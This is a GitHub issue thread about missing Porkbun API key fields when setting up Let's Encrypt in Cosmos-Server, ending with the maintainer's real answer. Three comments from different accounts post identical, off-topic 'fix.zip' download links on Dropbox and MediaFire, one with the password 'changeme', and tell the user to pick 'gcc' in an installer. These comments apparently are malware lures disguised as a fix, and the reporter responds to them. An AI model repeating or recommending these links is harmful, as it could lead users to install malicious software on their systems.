### ISSUE TITLE
Missing Config for Encrypt + Porkbun Issue

### ISSUE THREAD

**Issue by Dan-Yaw** [azukaar/Cosmos-Server#309]
### What happened?

I configured Cosmos to use let’s encrypt on a domain name purchased from Porkbun. I’m getting an error saying I need to supply a Porkbun API key. Additionally, I can’t access Cosmos at all from the domain name.

‘’’bash
[ERROR] LETSENCRYPT_DNS : porkbun: some credentials information are missing: PORKBUN_SECRET_API_KEY,PORKBUN_API_KEY
‘’’

### What should have happened?

I should have had a spot to put these parama

### Relevant log output

```shell
[ERROR] LETSENCRYPT_DNS : porkbun: some credentials information are missing: PORKBUN_SECRET_API_KEY,PORKBUN_API_KEY
```

### System details

- OS: Raspberry Pi OS Bookworm
- Browser Chrome
- Version ?

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dan-Yaw** [comment]
> Download https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 In the installer menu, select "gcc."

Hi Victor - do you have any more context or is this referenced somewhere else?

**Comment by Dan-Yaw** [comment]
And also, is there a way to reset everything to get back to the install menu, or do I need to remove the container and volumes and start fresh?

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by azukaar** [comment]
There is a "fresh install" checkbox when you reach the installer (newInstall: true in the config)
or just delete /var/lib/cosmos

There are fields for you to put your keys you simply missed them, but they are here: 
![image](https://github.com/user-attachments/assets/69b55cf3-323d-42dd-8f1d-46747e79896f)
